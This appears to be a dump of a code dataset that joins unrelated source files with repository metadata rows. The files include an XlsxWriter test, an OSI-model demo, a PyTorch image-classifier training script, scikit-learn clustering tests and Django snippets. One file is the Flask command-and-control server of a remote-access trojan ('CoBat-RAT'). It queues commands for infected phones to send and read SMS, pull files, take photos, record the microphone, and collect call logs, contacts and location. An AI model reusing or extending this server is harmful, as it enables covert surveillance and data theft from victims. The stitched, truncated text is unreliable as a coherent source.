"""
def setUp(self):
self.set_filename('textbox37.xlsx')
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file with textbox(s)."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
worksheet.insert_textbox('E9', 'This is some text',
{'url': 'https://github.com/jmcnamara',
'tip': 'GitHub'})
workbook.close()
self.assertExcelEqual()
| [
"jmcnamara@cpan.org"
] | jmcnamara@cpan.org |
02766d5ac9580d59e5ffe2d11f5af33f79f0e98c | db06c6cd07abba0d26c6e6c516ef3e5469e3fb68 | /python_project/__init__.py | 8c0560713310934ff7ab4b1e02a67c22df2fce9b | [
"MIT"
] | permissive | wasimusu/python_project | 77bba8333171de967768d17a47f45a698c933f7f | e2aab3998c2285eda8afe8f5dbb839cbcccd81ea | refs/heads/master | 2023-08-14T10:26:59.086216 | 2021-09-22T19:25:25 | 2021-09-22T19:25:25 | 295,631,767 | 6 | 5 | null | null | null | null | UTF-8 | Python | false | false | 93 | py | from .mathlib import add
from .strlib import split
from .combo import split_string_add_nums | [
"noreply@github.com"
] | wasimusu.noreply@github.com |
e340276963306dd0e9d27bdadb64734baea458b3 | 305db68aa8055792e0881a8d3c085ffc6830ffe1 | /cooldent/apps/params/admin.py | 8e58b0662c6863774e3a223f9c2ca8c1b24d7965 | [
"BSD-3-Clause"
] | permissive | cpaja/dentalcool | 9feaf7f9a39412469032666024715e886b98dd60 | 0d97a0b5c4897619ee0b224abed22880a9cc34f6 | refs/heads/master | 2020-03-21T19:42:01.578358 | 2018-06-28T05:36:29 | 2018-06-28T05:36:29 | 138,964,848 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 395 | py | # _*_ coding: utf-8 _*_
from django.contrib import admin
from django import forms
from django.utils.translation import ugettext_lazy as _
# models
from .models import Person
class PersonAdmin(admin.ModelAdmin):
search_fields = ('first_name', 'last_name',)
list_display = (
'first_name', 'last_name', 'identity_type', 'identity_num',)
admin.site.register(Person, PersonAdmin)
| [
"cesi.pacori@gmail.com"
] | cesi.pacori@gmail.com |
b2b5944e6faeb3d7ad3b5608f6728c36696eee3d | f204c8fa2530f685bf7499d4bf23b019baf4055c | /CoBat-Server/user-facing-command-center.py | 0f8d8cf61e29e04d9fd90a7802de9eba986a65c1 | [
"LicenseRef-scancode-warranty-disclaimer"
] | no_license | Phuong39/CoBat-RAT-Malware | db4310ff46ac85780988d0572669c508b609e8c7 | a32a6e46ab3a0d81c0ba3c854c9b7ae1fd4fc5df | refs/heads/master | 2023-08-29T20:09:50.753213 | 2021-09-05T16:57:24 | 2021-09-05T16:57:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,172 | py | from flask import Flask
from flask import request
from functools import wraps
import psycopg2
import uuid
import json
app = Flask(__name__)
conn = psycopg2.connect("host=127.0.0.1 port=5432 dbname=db user=user password=pwd")
sfalse = json.dumps({"success": False})
@app.errorhandler(404)
def handle404(error):
html = "<center>"
html += "<br><br><br>"
html += '<iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/dQw4w9WgXcQ?controls=0&autoplay=1" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>'
html += "<br>"
html += "nothing to do here :p"
html += "</center>"
return html
def general_validation(f):
@wraps(f)
def wrapped(*args, **kwargs):
if request.method == "POST":
if "deploy_id" not in request.form:
return sfalse
if request.method == "GET":
if "deploy_id" not in request.args:
return sfalse
return f(*args, **kwargs)
return wrapped
@app.route('/sms/send', methods=['POST'])
@general_validation
def sms_send():
form = request.form
if "target" in form and "payload" in form and "deploy_id" in form:
deploy_at = form["deploy_id"]
target = form["target"]
payload = form["payload"]
cur = conn.cursor()
# generate command_id
command_id = str(uuid.uuid4())
# command_id,deploy_id,command_type,start_at,finish_at,target,payload,args,command_raw
cur.execute("insert into command_center values (%s, %s, %s, 0, 0, %s, %s, '{}', '')",
(command_id, deploy_at, 'send-sms', target, payload))
# commit - save persistent
conn.commit()
# close cursor
cur.close()
return json.dumps({"command_id": command_id, "success": True})
return sfalse
@app.route('/sms/get')
def sms_get():
query = request.args
if "deploy_id" in query:
deploy_at = query["deploy_id"]
cur = conn.cursor()
# generate command_id
command_id = str(uuid.uuid4())
# command_id,deploy_id,command_type,start_at,finish_at,target,payload,args,command_raw
cur.execute("insert into command_center values (%s, %s, %s, 0, 0, '', '', '{}', '')",
(command_id, deploy_at, 'get-sms'))
# commit - save persistent
conn.commit()
# close cursor
cur.close()
return json.dumps({"command_id": command_id, "success": True})
return sfalse
@app.route('/file/upload', methods=['POST'])
@general_validation
def file_upload():
if 'file' not in request.files:
return sfalse
form = request.form
file = request.files['file']
if file.filename == '':
return sfalse
if "path" in form:
deploy_at = form["deploy_id"]
save_at = form["path"]
# generate command_id
command_id = str(uuid.uuid4())
ext = file.filename.split(".")[-1]
file.save("./" + command_id + "." + ext)
# open cursor
cur = conn.cursor()
# command_id,deploy_id,command_type,start_at,finish_at,target,payload,args,command_raw
cur.execute("insert into command_center values (%s, %s, %s, 0, 0, %s, %s, '{}', '')",
(command_id, deploy_at, 'upload-file', save_at))
# commit - save persistent
conn.commit()
# close cursor
cur.close()
return json.dumps({"command_id": command_id, "success": True})
return sfalse
@app.route('/file/download', methods=['POST'])
@general_validation
def file_download():
form = request.form
# path, recursive, description :
# if path is a single file, then malware must download that file
# to our server
# if path is a folder, download all files in the folder
# if path is a folder, and recursive option are enabled, that follow child path
# and download all the file
if "path" in form and "recursive" in form:
deploy_at = form["deploy_id"]
path = form["path"]
recursive = True if form["path"] == "true" else False
recursive_jsonb = json.dumps({"recursive": recursive})
# generate command_id
command_id = str(uuid.uuid4())
# open cursor
cur = conn.cursor()
# command_id,deploy_id,command_type,start_at,finish_at,target,payload,args,command_raw
cur.execute("insert into command_center values (%s, %s, %s, 0, 0, %s, '', %s, '')",
(command_id, deploy_at, 'download-file', path, recursive_jsonb))
# commit - save persistent
conn.commit()
# close cursor
cur.close()
return json.dumps({"command_id": command_id, "success": True})
return sfalse
@app.route('/camera/take')
@general_validation
def camera_take():
query = request.args
if "index" in query and "deploy_id" in query:
deploy_at = query["deploy_id"]
camera = query["index"]
# generate command_id
command_id = str(uuid.uuid4())
# open cursor
cur = conn.cursor()
# command_id,deploy_id,command_type,start_at,finish_at,target,payload,args,command_raw
cur.execute("insert into command_center values (%s, %s, %s, 0, 0, %s, '', '{}', '')",
(command_id, deploy_at, 'camera-take', camera))
# commit - save persistent
conn.commit()
# close cursor
cur.close()
return json.dumps({"command_id": command_id, "success": True})
return sfalse
@app.route("/call/log")
@general_validation
def call_log():
query = request.args
if "deploy_id" in query:
deploy_at = query["deploy_id"]
# generate command_id
command_id = str(uuid.uuid4())
# open cursor
cur = conn.cursor()
# command_id,deploy_id,command_type,start_at,finish_at,target,payload,args,command_raw
cur.execute("insert into command_center values (%s, %s, %s, 0, 0, '', '', '{}', '')",
(command_id, deploy_at, 'call-log'))
# commit - save persistent
conn.commit()
# close cursor
cur.close()
return json.dumps({"command_id": command_id, "success": True})
return sfalse
@app.route("/contact/save")
@general_validation
def contact_save():
form = request.form
if "name" in form and "phone" in form:
deploy_at = form["deploy_id"]
name = form["name"]
phone = form["phone"]
contact_jsonb = json.dumps({"name": name, "phone": phone})
# generate command_id
command_id = str(uuid.uuid4())
# open cursor
cur = conn.cursor()
# command_id,deploy_id,command_type,start_at,finish_at,target,payload,args,command_raw
cur.execute("insert into command_center values (%s, %s, %s, 0, 0, '', '', %s, '')",
(command_id, deploy_at, 'contact-save', contact_jsonb))
# commit - save persistent
conn.commit()
# close cursor
cur.close()
return json.dumps({"command_id": command_id, "success": True})
return sfalse
@app.route("/contact/get")
def contact_get():
deploy_at = request.args["deploy_id"]
# generate command_id
command_id = str(uuid.uuid4())
# open cursor
cur = conn.cursor()
# command_id,deploy_id,command_type,start_at,finish_at,target,payload,args,command_raw
cur.execute("insert into command_center values (%s, %s, %s, 0, 0, '', '', '{}', '')",
(command_id, deploy_at, 'contact-get'))
# commit - save persistent
conn.commit()
# close cursor
cur.close()
return json.dumps({"command_id": command_id, "success": True})
@app.route("/mic/record")
def mic_record():
deploy_at = request.args["deploy_id"]
record_time = 5
if "record_time" in request.args and request.args["record_time"].isdigit():
record_time = int(request.args["record_time"])
record_jsonb = json.dumps({"record_time": record_time})
# generate command_id
command_id = str(uuid.uuid4())
# open cursor
cur = conn.cursor()
# command_id,deploy_id,command_type,start_at,finish_at,target,payload,args,command_raw
cur.execute("insert into command_center values (%s, %s, %s, 0, 0, '', '', %s, '')",
(command_id, deploy_at, 'mic-record', record_jsonb))
# commit - save persistent
conn.commit()
# close cursor
cur.close()
return json.dumps({"command_id": command_id, "success": True})
@app.route("/location/get")
def location_get():
deploy_at = request.args["deploy_id"]
# generate command_id
command_id = str(uuid.uuid4())
# open cursor
cur = conn.cursor()
# command_id,deploy_id,command_type,start_at,finish_at,target,payload,args,command_raw
cur.execute("insert into command_center values (%s, %s, %s, 0, 0, '', '', '{}', '')",
(command_id, deploy_at, 'location-get'))
# commit - save persistent
conn.commit()
# close cursor
cur.close()
return json.dumps({"command_id": command_id, "success": True})
app.run(host="127.0.0.1", port=3000)
| [
"14269809+codenoid@users.noreply.github.com"
] | 14269809+codenoid@users.noreply.github.com |
b2baa6f16704f2315f831411ea57b852cf9a0b28 | 7322ec6b3352f8cca60bdfef49f8565d7667e478 | /OSI.py | 739fdd32a5bfa78e35d205d15fcb382531674b09 | [] | no_license | jayzoww/OSIModel | 21580baad4f71bc0d1c5636be0a038ad5a8881f9 | 401e91e50a34f23413259c3761cdc718ea30ff29 | refs/heads/master | 2021-01-20T03:21:17.051192 | 2017-04-26T23:24:18 | 2017-04-26T23:24:18 | 89,520,651 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,171 | py | from collections import OrderedDict
import binascii
import re
class OSIModel:
def __init__(self):
pass
def applicationLayer(self):
data = "message"
size = len(data)
print 'App Layer data:', data
print 'size:', size
print ' '
return data, size
def presentationLayer(self, message, size):
data=[]
temp=[]
#converts each character in message to integer representation of ASCII. This can be adapted to fit other encoding formats
for character in message:
data.append(ord(character))
#convert back to original ASCII Chars. This is purely to demonstrate that translation can occur between different syntax's/encodings
# for i in xrange(0, len(data)):
# data[i] = chr(data[i])
#Given MIME example header
data[:0] = '%'
header = 'MIME-version: 1.0'
for x in header:
temp.append(ord(x))
# print temp
data[:0] = temp
size = len(data)
print 'Presentation data:', data
print 'size:', size
return data, size
def sessionLayer(self, message, size):
data=message
temp=[]
header = 'SessionHeader'
for x in header:
temp.append(ord(x))
#attach header to beginning of message
data[:0] = temp
size = len(data)
print 'Session data:', data
print 'size:', size
return data, size
def transportLayer(self, message, size):
data = message
#following dictionary stores TCP protocol params
dict = OrderedDict([
('destPort',self.intToBin(25, 16)),
('sourcePort',self.intToBin(25, 16)),
('sequence',self.intToBin(2399401, 32)),
('ackNumber',self.intToBin(136622, 32)),
('dataOffset',self.intToBin(4, 4)),
('reserved',self.intToBin(0, 3)),
('NS', self.intToBin(0, 1)),
('URG',self.intToBin(0, 1)),
('ACK',self.intToBin(1, 1)),
('PSH',self.intToBin(1, 1)),
('RST',self.intToBin(0, 1)),
('SYN',self.intToBin(0, 1)),
('FIN',self.intToBin(1, 1)),
('window',self.intToBin(8, 16)),
('checkSum',self.intToBin(128, 16)),
('urgPointer',self.intToBin(0, 1))
])
#print dict.values()
data[:0] = list(dict.values())
size = len(data)
print 'Transport data:', data
print 'size:', size
return data, size
def networkLayer(self, message, size):
data = message
IPaddress = "192.168.1.100"
IP = map(int, IPaddress.split('.'))
#print IP
dict = OrderedDict([
('ip0', self.intToBin(IP[0], 8)),
('ip1', self.intToBin(IP[1], 8)),
('ip2', self.intToBin(IP[2], 8)),
('ip3', self.intToBin(IP[3], 8)),
])
data[:0] = list(dict.values())
size = len(data)
print 'Transport data:', data
print 'size:', size
return data, size
def dataLinkLayer(self, message, size):
data = message
temp = []
sourceAddr = '01:FF:3C:E4:22:8A'
destAddr = '9A:FC:32:54:A8:3E'
_type = '00'
#remove : from mac address
sourceAddr = re.sub(':', '', sourceAddr)
destAddr = re.sub(':', '', destAddr)
#convert hex to ascii
sourceAscii = binascii.unhexlify(sourceAddr)
destAscii = binascii.unhexlify(destAddr)
typeAscii = binascii.unhexlify(_type)
#convert ascii to int representation, store in temp list
for x in sourceAscii:
temp.append(ord(x))
for y in destAscii:
temp.append(ord(y))
for z in typeAscii:
temp.append(ord(z))
data [:0] = temp
size = len(data)
print 'DataLink data:', data
print 'size:', size
return data, size
def physicalLayer(self, message, size):
data = message
for i in xrange(0, len(data)):
if type(data[i]) is int:
data[i] = self.intToBin(data[i], 8)
transmitted = ''.join(data)
print 'Transmitted Bits:', transmitted
print 'size:', size*8
return transmitted
def intToBin(self, value, bits):
#This class converts integer to binary, pads leading 0's to obtain correct length
number = value
size = bits
binary = bin(number)[2:]
padded = binary.zfill(size)
return padded
if __name__ == '__main__':
OSI = OSIModel()
foo = '00'
data, size = OSI.applicationLayer()
data, size = OSI.presentationLayer(data, size)
data, size = OSI.sessionLayer(data, size)
data, size = OSI.transportLayer(data, size)
data, size = OSI.networkLayer(data, size)
data, size = OSI.dataLinkLayer(data, size)
global transmittedbits
transmittedbits = OSI.physicalLayer(data, size)
| [
"jayzhao94@gmail.com"
] | jayzhao94@gmail.com |
bbd4c06da73ee72b6d850c6aa7f9624284ed2171 | fb594bf2cd33157a1d1d486e25c8014d6463fe9b | /project-2/object-recognition/train_image_classifier.py | 01542da6a3a4218c12989d730954c6ae41628433 | [] | no_license | ShirleyHan6/CZ4042-Assignments | 6469d2977b07302c5496eb9f83b360e6e5f06500 | 915b2e53008575741627333103bafbef1a91d600 | refs/heads/master | 2020-08-14T00:01:36.843411 | 2019-11-16T05:57:25 | 2019-11-16T05:57:25 | 215,060,266 | 0 | 2 | null | 2019-11-16T05:57:27 | 2019-10-14T14:05:58 | Python | UTF-8 | Python | false | false | 3,659 | py | """
Train image classifier given model configuration. The trained model and statistic result are saved in
output/image-classifier-{datetime}.pth and output/image-classifier-stat-{datetime}.pkl respectively.
The statistic result can be plotted by function helper.plot_train_and_test.
"""
import argparse
import numpy as np
import torch
import tqdm
from datetime import datetime
from torch import nn
from torch import optim
from torch.optim.rmsprop import RMSprop
from configs import OUTPUT_DIR, parse_config
from helper.training import train, test, load_cifar_dataset
from models.classifier import CIFARClassifier
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--epoch', type=int, default=800, help='epoch number for training')
parser.add_argument('--bs', type=int, default=128, help='batch size for training and testing')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--momentum', type=float, default=0, help='momentum')
parser.add_argument('--optimizer', type=str, default='sgd', help='optimizer for training')
parser.add_argument('--output', type=str, default='', help='output name of model and statistic result')
parser.add_argument('config', type=str, help='model configuration yaml path')
return parser.parse_args()
def train_image_classifier(args):
lr = args.lr
epochs = args.epoch
bs = args.bs
# prepare data
train_loader, test_loader = load_cifar_dataset(batch_size=bs)
# model
print('Using configuration: {}'.format(args.config))
config = parse_config(args.config)
net = CIFARClassifier(config).cuda()
# optimizer
if args.optimizer == 'sgd':
optimizer = optim.SGD(net.parameters(), lr=lr)
elif args.optimizer == 'momentum':
optimizer = optim.SGD(net.parameters(), lr=lr, momentum=args.momentum)
elif args.optimizer == 'rmsprop':
optimizer = RMSprop(net.parameters(), lr=lr)
elif args.optimizer == 'adam':
optimizer = optim.Adam(net.parameters(), lr=lr)
else:
raise ValueError('optimizer name not correct')
# loss
loss = nn.CrossEntropyLoss()
# statistics
train_losses = np.zeros(epochs, dtype=np.float)
train_accs = np.zeros(epochs, dtype=np.float)
test_losses = np.zeros(epochs, dtype=np.float)
test_accs = np.zeros(epochs, dtype=np.float)
best_test_loss = float('inf')
# misc
name_seed = datetime.now().strftime('%m%d-%H%M%S')
t = tqdm.trange(epochs)
for epoch in t:
train_loss, train_acc = train(net, data_loader=train_loader, optimizer=optimizer, criterion=loss)
test_loss, test_acc = test(net, data_loader=test_loader, criterion=loss)
# process statistics
train_losses[epoch], train_accs[epoch] = train_loss, train_acc
test_losses[epoch], test_accs[epoch] = test_loss, test_acc
t.set_description('[epoch {:d}] train loss {:g} | acc {:g} || val loss {:g} | acc {:g}'
.format(epoch, train_loss, train_acc, test_loss, test_acc))
# save model
if test_loss < best_test_loss:
best_test_loss = test_loss
torch.save(net.state_dict(), OUTPUT_DIR / '{}-{:s}.pth'.format(args.output, name_seed))
training_info = {'batch_size': bs, 'epoch': epochs, 'lr': lr,
'name_seed': name_seed}
stat = {'train_loss': train_losses, 'train_acc': train_accs, 'test_loss': test_losses, 'test_acc': test_accs}
content = {'info': training_info, 'stat': stat}
return content
if __name__ == '__main__':
train_image_classifier(parse_args())
| [
"YLI056@e.ntu.edu.sg"
] | YLI056@e.ntu.edu.sg |
b2bbffbbb7d3256b4c3e67c00a644e6cd2cc97bf | ca66a4283c5137f835377c3ed9a37128fcaed037 | /Lib/site-packages/sklearn/metrics/cluster/tests/test_supervised.py | 9eccf9696f7b88ea5a09c76d8b784abf3a66d5d4 | [] | no_license | NamithaKonda09/majorProject | f377f7a77d40939a659a3e59f5f1b771d88889ad | 4eff4ff18fa828c6278b00244ff2e66522e0cd51 | refs/heads/master | 2023-06-04T20:25:38.450271 | 2021-06-24T19:03:46 | 2021-06-24T19:03:46 | 370,240,034 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,620 | py | import numpy as np
from sklearn.metrics.cluster import adjusted_mutual_info_score
from sklearn.metrics.cluster import adjusted_rand_score
from sklearn.metrics.cluster import completeness_score
from sklearn.metrics.cluster import contingency_matrix
from sklearn.metrics.cluster import entropy
from sklearn.metrics.cluster import expected_mutual_information
from sklearn.metrics.cluster import fowlkes_mallows_score
from sklearn.metrics.cluster import homogeneity_completeness_v_measure
from sklearn.metrics.cluster import homogeneity_score
from sklearn.metrics.cluster import mutual_info_score
from sklearn.metrics.cluster import normalized_mutual_info_score
from sklearn.metrics.cluster import v_measure_score
from sklearn.metrics.cluster.supervised import _generalized_average
from sklearn.utils import assert_all_finite
from sklearn.utils.testing import (
assert_equal, assert_almost_equal, assert_raise_message,
assert_warns_message, ignore_warnings
)
from numpy.testing import assert_array_almost_equal
score_funcs = [
adjusted_rand_score,
homogeneity_score,
completeness_score,
v_measure_score,
adjusted_mutual_info_score,
normalized_mutual_info_score,
]
def test_future_warning():
score_funcs_with_changing_means = [
normalized_mutual_info_score,
adjusted_mutual_info_score,
]
warning_msg = "The behavior of "
args = [0, 0, 0], [0, 0, 0]
for score_func in score_funcs_with_changing_means:
assert_warns_message(FutureWarning, warning_msg, score_func, *args)
@ignore_warnings(category=FutureWarning)
def test_error_messages_on_wrong_input():
for score_func in score_funcs:
expected = ('labels_true and labels_pred must have same size,'
' got 2 and 3')
assert_raise_message(ValueError, expected, score_func,
[0, 1], [1, 1, 1])
expected = "labels_true must be 1D: shape is (2"
assert_raise_message(ValueError, expected, score_func,
[[0, 1], [1, 0]], [1, 1, 1])
expected = "labels_pred must be 1D: shape is (2"
assert_raise_message(ValueError, expected, score_func,
[0, 1, 0], [[1, 1], [0, 0]])
def test_generalized_average():
a, b = 1, 2
methods = ["min", "geometric", "arithmetic", "max"]
means = [_generalized_average(a, b, method) for method in methods]
assert means[0] <= means[1] <= means[2] <= means[3]
c, d = 12, 12
means = [_generalized_average(c, d, method) for method in methods]
assert means[0] == means[1] == means[2] == means[3]
@ignore_warnings(category=FutureWarning)
def test_perfect_matches():
for score_func in score_funcs:
assert_equal(score_func([], []), 1.0)
assert_equal(score_func([0], [1]), 1.0)
assert_equal(score_func([0, 0, 0], [0, 0, 0]), 1.0)
assert_equal(score_func([0, 1, 0], [42, 7, 42]), 1.0)
assert_equal(score_func([0., 1., 0.], [42., 7., 42.]), 1.0)
assert_equal(score_func([0., 1., 2.], [42., 7., 2.]), 1.0)
assert_equal(score_func([0, 1, 2], [42, 7, 2]), 1.0)
score_funcs_with_changing_means = [
normalized_mutual_info_score,
adjusted_mutual_info_score,
]
means = {"min", "geometric", "arithmetic", "max"}
for score_func in score_funcs_with_changing_means:
for mean in means:
assert score_func([], [], mean) == 1.0
assert score_func([0], [1], mean) == 1.0
assert score_func([0, 0, 0], [0, 0, 0], mean) == 1.0
assert score_func([0, 1, 0], [42, 7, 42], mean) == 1.0
assert score_func([0., 1., 0.], [42., 7., 42.], mean) == 1.0
assert score_func([0., 1., 2.], [42., 7., 2.], mean) == 1.0
assert score_func([0, 1, 2], [42, 7, 2], mean) == 1.0
def test_homogeneous_but_not_complete_labeling():
# homogeneous but not complete clustering
h, c, v = homogeneity_completeness_v_measure(
[0, 0, 0, 1, 1, 1],
[0, 0, 0, 1, 2, 2])
assert_almost_equal(h, 1.00, 2)
assert_almost_equal(c, 0.69, 2)
assert_almost_equal(v, 0.81, 2)
def test_complete_but_not_homogeneous_labeling():
# complete but not homogeneous clustering
h, c, v = homogeneity_completeness_v_measure(
[0, 0, 1, 1, 2, 2],
[0, 0, 1, 1, 1, 1])
assert_almost_equal(h, 0.58, 2)
assert_almost_equal(c, 1.00, 2)
assert_almost_equal(v, 0.73, 2)
def test_not_complete_and_not_homogeneous_labeling():
# neither complete nor homogeneous but not so bad either
h, c, v = homogeneity_completeness_v_measure(
[0, 0, 0, 1, 1, 1],
[0, 1, 0, 1, 2, 2])
assert_almost_equal(h, 0.67, 2)
assert_almost_equal(c, 0.42, 2)
assert_almost_equal(v, 0.52, 2)
def test_non_consecutive_labels():
# regression tests for labels with gaps
h, c, v = homogeneity_completeness_v_measure(
[0, 0, 0, 2, 2, 2],
[0, 1, 0, 1, 2, 2])
assert_almost_equal(h, 0.67, 2)
assert_almost_equal(c, 0.42, 2)
assert_almost_equal(v, 0.52, 2)
h, c, v = homogeneity_completeness_v_measure(
[0, 0, 0, 1, 1, 1],
[0, 4, 0, 4, 2, 2])
assert_almost_equal(h, 0.67, 2)
assert_almost_equal(c, 0.42, 2)
assert_almost_equal(v, 0.52, 2)
ari_1 = adjusted_rand_score([0, 0, 0, 1, 1, 1], [0, 1, 0, 1, 2, 2])
ari_2 = adjusted_rand_score([0, 0, 0, 1, 1, 1], [0, 4, 0, 4, 2, 2])
assert_almost_equal(ari_1, 0.24, 2)
assert_almost_equal(ari_2, 0.24, 2)
@ignore_warnings(category=FutureWarning)
def uniform_labelings_scores(score_func, n_samples, k_range, n_runs=10,
seed=42):
# Compute score for random uniform cluster labelings
random_labels = np.random.RandomState(seed).randint
scores = np.zeros((len(k_range), n_runs))
for i, k in enumerate(k_range):
for j in range(n_runs):
labels_a = random_labels(low=0, high=k, size=n_samples)
labels_b = random_labels(low=0, high=k, size=n_samples)
scores[i, j] = score_func(labels_a, labels_b)
return scores
@ignore_warnings(category=FutureWarning)
def test_adjustment_for_chance():
# Check that adjusted scores are almost zero on random labels
n_clusters_range = [2, 10, 50, 90]
n_samples = 100
n_runs = 10
scores = uniform_labelings_scores(
adjusted_rand_score, n_samples, n_clusters_range, n_runs)
max_abs_scores = np.abs(scores).max(axis=1)
assert_array_almost_equal(max_abs_scores, [0.02, 0.03, 0.03, 0.02], 2)
@ignore_warnings(category=FutureWarning)
def test_adjusted_mutual_info_score():
# Compute the Adjusted Mutual Information and test against known values
labels_a = np.array([1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3, 3])
labels_b = np.array([1, 1, 1, 1, 2, 1, 2, 2, 2, 2, 3, 1, 3, 3, 3, 2, 2])
# Mutual information
mi = mutual_info_score(labels_a, labels_b)
assert_almost_equal(mi, 0.41022, 5)
# with provided sparse contingency
C = contingency_matrix(labels_a, labels_b, sparse=True)
mi = mutual_info_score(labels_a, labels_b, contingency=C)
assert_almost_equal(mi, 0.41022, 5)
# with provided dense contingency
C = contingency_matrix(labels_a, labels_b)
mi = mutual_info_score(labels_a, labels_b, contingency=C)
assert_almost_equal(mi, 0.41022, 5)
# Expected mutual information
n_samples = C.sum()
emi = expected_mutual_information(C, n_samples)
assert_almost_equal(emi, 0.15042, 5)
# Adjusted mutual information
ami = adjusted_mutual_info_score(labels_a, labels_b)
assert_almost_equal(ami, 0.27502, 5)
ami = adjusted_mutual_info_score([1, 1, 2, 2], [2, 2, 3, 3])
assert_equal(ami, 1.0)
# Test with a very large array
a110 = np.array([list(labels_a) * 110]).flatten()
b110 = np.array([list(labels_b) * 110]).flatten()
ami = adjusted_mutual_info_score(a110, b110)
# This is not accurate to more than 2 places
assert_almost_equal(ami, 0.37, 2)
def test_expected_mutual_info_overflow():
# Test for regression where contingency cell exceeds 2**16
# leading to overflow in np.outer, resulting in EMI > 1
assert expected_mutual_information(np.array([[70000]]), 70000) <= 1
def test_int_overflow_mutual_info_fowlkes_mallows_score():
# Test overflow in mutual_info_classif and fowlkes_mallows_score
x = np.array([1] * (52632 + 2529) + [2] * (14660 + 793) + [3] * (3271 +
204) + [4] * (814 + 39) + [5] * (316 + 20))
y = np.array([0] * 52632 + [1] * 2529 + [0] * 14660 + [1] * 793 +
[0] * 3271 + [1] * 204 + [0] * 814 + [1] * 39 + [0] * 316 +
[1] * 20)
assert_all_finite(mutual_info_score(x, y))
assert_all_finite(fowlkes_mallows_score(x, y))
def test_entropy():
ent = entropy([0, 0, 42.])
assert_almost_equal(ent, 0.6365141, 5)
assert_almost_equal(entropy([]), 1)
def test_contingency_matrix():
labels_a = np.array([1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3, 3])
labels_b = np.array([1, 1, 1, 1, 2, 1, 2, 2, 2, 2, 3, 1, 3, 3, 3, 2, 2])
C = contingency_matrix(labels_a, labels_b)
C2 = np.histogram2d(labels_a, labels_b,
bins=(np.arange(1, 5),
np.arange(1, 5)))[0]
assert_array_almost_equal(C, C2)
C = contingency_matrix(labels_a, labels_b, eps=.1)
assert_array_almost_equal(C, C2 + .1)
def test_contingency_matrix_sparse():
labels_a = np.array([1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3, 3])
labels_b = np.array([1, 1, 1, 1, 2, 1, 2, 2, 2, 2, 3, 1, 3, 3, 3, 2, 2])
C = contingency_matrix(labels_a, labels_b)
C_sparse = contingency_matrix(labels_a, labels_b, sparse=True).toarray()
assert_array_almost_equal(C, C_sparse)
C_sparse = assert_raise_message(ValueError,
"Cannot set 'eps' when sparse=True",
contingency_matrix, labels_a, labels_b,
eps=1e-10, sparse=True)
@ignore_warnings(category=FutureWarning)
def test_exactly_zero_info_score():
# Check numerical stability when information is exactly zero
for i in np.logspace(1, 4, 4).astype(np.int):
labels_a, labels_b = (np.ones(i, dtype=np.int),
np.arange(i, dtype=np.int))
assert_equal(normalized_mutual_info_score(labels_a, labels_b), 0.0)
assert_equal(v_measure_score(labels_a, labels_b), 0.0)
assert_equal(adjusted_mutual_info_score(labels_a, labels_b), 0.0)
assert_equal(normalized_mutual_info_score(labels_a, labels_b), 0.0)
for method in ["min", "geometric", "arithmetic", "max"]:
assert adjusted_mutual_info_score(labels_a, labels_b,
method) == 0.0
assert normalized_mutual_info_score(labels_a, labels_b,
method) == 0.0
def test_v_measure_and_mutual_information(seed=36):
# Check relation between v_measure, entropy and mutual information
for i in np.logspace(1, 4, 4).astype(np.int):
random_state = np.random.RandomState(seed)
labels_a, labels_b = (random_state.randint(0, 10, i),
random_state.randint(0, 10, i))
assert_almost_equal(v_measure_score(labels_a, labels_b),
2.0 * mutual_info_score(labels_a, labels_b) /
(entropy(labels_a) + entropy(labels_b)), 0)
avg = 'arithmetic'
assert_almost_equal(v_measure_score(labels_a, labels_b),
normalized_mutual_info_score(labels_a, labels_b,
average_method=avg)
)
def test_fowlkes_mallows_score():
# General case
score = fowlkes_mallows_score([0, 0, 0, 1, 1, 1],
[0, 0, 1, 1, 2, 2])
assert_almost_equal(score, 4. / np.sqrt(12. * 6.))
# Perfect match but where the label names changed
perfect_score = fowlkes_mallows_score([0, 0, 0, 1, 1, 1],
[1, 1, 1, 0, 0, 0])
assert_almost_equal(perfect_score, 1.)
# Worst case
worst_score = fowlkes_mallows_score([0, 0, 0, 0, 0, 0],
[0, 1, 2, 3, 4, 5])
assert_almost_equal(worst_score, 0.)
def test_fowlkes_mallows_score_properties():
# handcrafted example
labels_a = np.array([0, 0, 0, 1, 1, 2])
labels_b = np.array([1, 1, 2, 2, 0, 0])
expected = 1. / np.sqrt((1. + 3.) * (1. + 2.))
# FMI = TP / sqrt((TP + FP) * (TP + FN))
score_original = fowlkes_mallows_score(labels_a, labels_b)
assert_almost_equal(score_original, expected)
# symmetric property
score_symmetric = fowlkes_mallows_score(labels_b, labels_a)
assert_almost_equal(score_symmetric, expected)
# permutation property
score_permuted = fowlkes_mallows_score((labels_a + 1) % 3, labels_b)
assert_almost_equal(score_permuted, expected)
# symmetric and permutation(both together)
score_both = fowlkes_mallows_score(labels_b, (labels_a + 2) % 3)
assert_almost_equal(score_both, expected)
| [
"namithakonda09@gmail.com"
] | namithakonda09@gmail.com |
3b2147fdc39d45b2c72e4f2c7804a3e48682757f | 30efc8790f69be554c8d890df027a59d8de08e2b | /blog/models.py | f72950618fd5d1702b71f12a069ae16db5fdd2e6 | [] | no_license | julianyraiol/djangogirls-blog | 2bd1fdbe22b1cbbddda7600b675404cd93ff6af0 | 97361045f29c90d29c3cfe14137c3dfacba6b7c2 | refs/heads/master | 2020-04-01T20:55:41.201672 | 2018-10-18T20:16:52 | 2018-10-18T20:16:52 | 153,627,199 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 533 | py | from django.db import models
from django.utils import timezone
# Create your models here.
class Post(models.Model):
author = models.ForeignKey('auth.User', on_delete=models.CASCADE)
title = models.CharField(max_length=200)
